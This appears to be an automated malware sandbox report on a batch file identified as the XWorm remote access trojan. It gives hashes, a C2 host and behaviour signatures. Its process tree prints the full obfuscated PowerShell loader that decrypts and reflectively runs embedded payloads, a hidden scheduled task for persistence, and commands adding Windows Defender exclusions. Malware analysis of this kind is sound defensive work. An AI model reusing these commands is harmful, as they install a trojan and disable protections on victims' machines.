Overview

overview

10

Static

static

1

world.bat

windows7-x64

8

world.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/03/2025, 10:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    world.bat

  • Size

    94KB

  • MD5

    a5bd53f790ed63251d0f435b17ada13d

  • SHA1

    c0ada960a41596819df77f185dfe79b730ade6c8

  • SHA256

    348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e

  • SHA512

    fe034f585627253eb436fc7f0b0d831e70acf93351c09e97ddb21f569cd1fc158777738eb24910c66d2a65d560801bb4cfb0835281f711f21e4e8d45e06fcfa0

  • SSDEEP

    1536:y3UhPdcYkDCDYe694UQ3DvwDnqFDdbYdLRmUpDLHcfVWeIZ9U1mRDLOeBrT:y3K6Yb694VzvweEUUefVmZOwRDLOW

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

moneyfraud-30212.portmap.host:30212

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    SvcManager.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 14 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\world.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3540
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pRmtmB/ugH2fDAdQ1jnbQ+2xlrRevgyzMZYoaNcI2bA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z/EhX1qbRvIc8ksyAuzKnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ildFc=New-Object System.IO.MemoryStream(,$param_var); $BIzdO=New-Object System.IO.MemoryStream; $wvVkJ=New-Object System.IO.Compression.GZipStream($ildFc, [IO.Compression.CompressionMode]::Decompress); $wvVkJ.CopyTo($BIzdO); $wvVkJ.Dispose(); $ildFc.Dispose(); $BIzdO.Dispose(); $BIzdO.ToArray();}function execute_function($param_var,$param2_var){ $hzQGQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MmgRI=$hzQGQ.EntryPoint; $MmgRI.Invoke($null, $param2_var);}$cnMfq = 'C:\Users\Admin\AppData\Local\Temp\world.bat';$host.UI.RawUI.WindowTitle = $cnMfq;$KwfLC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cnMfq).Split([Environment]::NewLine);foreach ($IjgYh in $KwfLC) { if ($IjgYh.StartsWith(':: ')) { $cbUwg=$IjgYh.Substring(3); break; }}$payloads_var=[string[]]$cbUwg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4484
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_748_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_748.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4936
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_748.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1236
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_748.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4420
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pRmtmB/ugH2fDAdQ1jnbQ+2xlrRevgyzMZYoaNcI2bA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z/EhX1qbRvIc8ksyAuzKnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ildFc=New-Object System.IO.MemoryStream(,$param_var); $BIzdO=New-Object System.IO.MemoryStream; $wvVkJ=New-Object System.IO.Compression.GZipStream($ildFc, [IO.Compression.CompressionMode]::Decompress); $wvVkJ.CopyTo($BIzdO); $wvVkJ.Dispose(); $ildFc.Dispose(); $BIzdO.Dispose(); $BIzdO.ToArray();}function execute_function($param_var,$param2_var){ $hzQGQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MmgRI=$hzQGQ.EntryPoint; $MmgRI.Invoke($null, $param2_var);}$cnMfq = 'C:\Users\Admin\AppData\Roaming\startup_str_748.bat';$host.UI.RawUI.WindowTitle = $cnMfq;$KwfLC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cnMfq).Split([Environment]::NewLine);foreach ($IjgYh in $KwfLC) { if ($IjgYh.StartsWith(':: ')) { $cbUwg=$IjgYh.Substring(3); break; }}$payloads_var=[string[]]$cbUwg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:5016
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1360
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:516
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\SvcManager.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3552
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SvcManager.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3876

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    8d5fe49a6d05162ab272133c3fc15a25

    SHA1

    df46f3763985ebac47b07f73a3d38de0e1c5f43b

    SHA256

    918088bfc29848ea90bcffc4a924f99971340d2fb4e404484fc6761b9ece19d5

    SHA512

    c50ac86a5814e0d91f6431c4e2ccddad2ea591bf0c919910a3ecd982fbe792f43b5640ce79e2679a308ea161d7e291a6a1d7e3400a2c91c606e13bac4bac390d

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    d28a889fd956d5cb3accfbaf1143eb6f

    SHA1

    157ba54b365341f8ff06707d996b3635da8446f7

    SHA256

    21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

    SHA512

    0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    5cfe303e798d1cc6c1dab341e7265c15

    SHA1

    cd2834e05191a24e28a100f3f8114d5a7708dc7c

    SHA256

    c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab

    SHA512

    ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    60945d1a2e48da37d4ce8d9c56b6845a

    SHA1

    83e80a6acbeb44b68b0da00b139471f428a9d6c1

    SHA256

    314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3

    SHA512

    5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4biouegh.zse.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_748.bat
    Filesize

    94KB

    MD5

    a5bd53f790ed63251d0f435b17ada13d

    SHA1

    c0ada960a41596819df77f185dfe79b730ade6c8

    SHA256

    348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e

    SHA512

    fe034f585627253eb436fc7f0b0d831e70acf93351c09e97ddb21f569cd1fc158777738eb24910c66d2a65d560801bb4cfb0835281f711f21e4e8d45e06fcfa0

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_748.vbs
    Filesize

    115B

    MD5

    64992dc9b649141b4b074225677daafa

    SHA1

    e5b818e6b4097d0532922b613d10316079f3264e

    SHA256

    8e189a75f67793cf2c7251278d8aa9b963e7afec14ac663da5c203c667a74bb2

    SHA512

    1cfa9598a88f4e20331d6fcac1b1de9b8428df5346da050ba644b8061954f26ffb84621e9bbdc8091df840e252d3ace97981722866cb842ab75dbbe0a3eee46c

    Download Submit

  • memory/4484-11-0x00007FFEE7E60000-0x00007FFEE8921000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4484-14-0x0000028F6E9A0000-0x0000028F6E9B4000-memory.dmp

    Filesize

    80KB

    Download

  • memory/4484-0-0x00007FFEE7E63000-0x00007FFEE7E65000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4484-13-0x0000028F567D0000-0x0000028F567D8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/4484-12-0x00007FFEE7E60000-0x00007FFEE8921000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4484-50-0x00007FFEE7E60000-0x00007FFEE8921000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4484-10-0x0000028F70A60000-0x0000028F70A82000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4936-30-0x00007FFEE7E60000-0x00007FFEE8921000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4936-18-0x00007FFEE7E60000-0x00007FFEE8921000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4936-17-0x00007FFEE7E60000-0x00007FFEE8921000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4936-16-0x00007FFEE7E60000-0x00007FFEE8921000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5016-49-0x000001B7E8930000-0x000001B7E8948000-memory.dmp

    Filesize

    96KB

    Download